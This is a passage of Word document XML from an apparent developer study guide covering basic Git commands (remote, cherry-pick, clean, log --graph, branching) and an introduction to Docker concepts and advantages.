          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manages the remote repositories that your local repository tracks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4583BDB0"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lastRenderedPageBreak/>
        <w:t>Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use this command to view, add, or remove remotes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10E6AC"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remote -v         # Shows the remotes for the repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E42B5"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remote add origin https://github.com/user/repository.git   # Adds a remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201D4A7"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remote remove origin    # Removes a remote repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47B54D" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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F973B0C">
          <v:rect id="_x0000_i3345" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39033260"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19. git cherry-pick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB059D3"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Applies a specific commit from one branch onto another.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A72E265"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is useful when you want to apply a specific commit from one branch to another without merging the entire branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5464285D"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cherry-pick commit_id    # Applies a single commit to the current branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D524D"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20. git clean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB17A1"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes untracked files from the working directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C67C84"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This command is useful to clean up your working directory by removing files that are not being tracked by Git.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A3A5B3"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clean -f              # Removes untracked files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2618A463"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clean -fd             # Removes untracked files and directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A673412" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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7C0F402">
          <v:rect id="_x0000_i3346" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="044562AC"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21. git log --graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E70293"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Visualizes the commit history in a graphical format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AB40B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps in understanding the branch structure and merges in the commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9E089"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log --graph --oneline   # Visualizes commit history with a graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E7E01B" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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05DB07F">
          <v:rect id="_x0000_i3347" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D3ADB"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 xml:space="preserve">These are some of the essential </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Git commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will often use to work with version control in software development. Git helps you manage your code, collaborate with others, and track changes efficiently across different versions and branches of a project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A84370D" w14:textId="29E4B4CF" w:rsidR="000C6CF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000C6CF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05A791B">
          <v:rect id="_x0000_i3348" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E185A" w14:textId="66F0595B" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="006B0450">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="830" w:name="_Toc196308310"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the Git command to create a new branch from an existing branch</w:t>
      </w:r>
      <w:r w:rsidR="00D70F52" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="830"/>
    </w:p>
    <w:p w14:paraId="7D6B315A" w14:textId="287CE16D" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To create a new branch from an existing branch in Git, you can use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145149FA"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checkout -b new-branch-name existing-branch-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8FAE1A" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16CA59"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checkout -b new-branch-name: Creates a new branch with the name new-branch-name and switches to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715DAD4B"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existing-branch-name: Specifies the branch you are branching from. If you don't provide an existing branch name, Git will create the new branch from the current branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE04D7"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Alternatively, you can use this sequence of commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C89D7"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Checkout the existing branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60DFDC"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checkout existing-branch-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78E433"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Create and switch to the new branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED733DE"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git checkout -b new-branch-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDC675" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This will create the new branch based on the specified existing-branch-name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D2585" w14:textId="0C538543" w:rsidR="000C6CF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000C6CF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B873043">
          <v:rect id="_x0000_i3349" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE34E79" w14:textId="3B337B5F" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70F52" w:rsidP="000C6CF9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB66381" w14:textId="1CADA6C3" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="831" w:name="_Toc196308311"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Docker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="831"/>
    </w:p>
    <w:p w14:paraId="785DA573" w14:textId="77777777" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00145166" w:rsidP="00145166">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057ED3DB" w14:textId="4C0FFF12" w:rsidR="00145166" w:rsidRPr="00CE4B95" w:rsidRDefault="00145166" w:rsidP="00145166">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="832" w:name="_Toc196308312"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Docker?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="832"/>
    </w:p>
    <w:p w14:paraId="607AE511" w14:textId="0296F8F5" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Docker is a platform and tool for developing, shipping, and running applications in lightweight, portable containers. It provides a standardized way to package and distribute software applications and their dependencies, ensuring that the software works consistently across different computing environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2A254" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts of Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A529A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Containerization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F8881" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker uses containers to package applications along with all the necessary dependencies (such as libraries, configurations, and runtime environments). This allows the application to run uniformly across any environment, such as a developer’s laptop, a testing server, or a production machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F49D4B"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Images</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D433DAF" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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A Docker image is a lightweight, stand-alone, executable package that includes everything needed to run a piece of software (code, runtime, libraries, environment variables, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A22ABC" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Images are immutable, meaning once created, they don't change. To modify an image, a new one must be created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E1EB3"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Containers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC9FE8" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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A Docker container is a running instance of a Docker image. It is an isolated process that runs in user space on the host machine and can be started, stopped, and restarted as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748F49E4" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Containers share the host operating system's kernel but run in isolated environments with their own filesystem, processes, and network stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38129C06"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF8771C" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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A Dockerfile is a script containing a set of instructions to build a Docker image. It defines the base image, the commands to install dependencies, copy application files, and set up the environment for the application to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE3A5A"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Hub</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11459F" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker Hub is a public repository for Docker images, allowing developers to store, share, and retrieve Docker images. It includes both official images (like those for Nginx, MySQL, etc.) and user-contributed images.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A89DB5"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker Compose</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB70465" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker Compose is a tool for defining and running multi-container Docker applications. It allows you to define the services (containers) that make up your app, their configurations, networks, and volumes, in a YAML file. You can then bring up your entire application with a single command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A304FC9" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advantages of Docker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A71BB98"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Portability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38368D70" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Since containers encapsulate all the dependencies and configuration, they can be run on any machine that supports Docker (regardless of the underlying OS) without worrying about differences in the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDCC5A6"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7397417A" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker ensures that the application will run the same way in any environment, making it easier to test and deploy software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB7CCCD"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238821C" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Each container runs in isolation, so it doesn’t interfere with other applications or services running on the same host. This ensures that dependencies or environment variables don't clash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE41109"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646E6E32" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Docker makes it easy to scale applications by running multiple containers for different components, managing them with orchestration tools like Kubernetes or Docker Swarm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B866288"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Efficiency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7EEA99" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Containers are lightweight compared to virtual machines, sharing the host OS kernel, and providing faster start-up times and lower overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FADEB4" w14:textId="77777777" w:rsidR="004435BE" w:rsidRPr="00B5655D" w:rsidRDefault="004435BE" w:rsidP="00B5655D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5655D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example Docker Workflow:</w:t>
      </w:r>
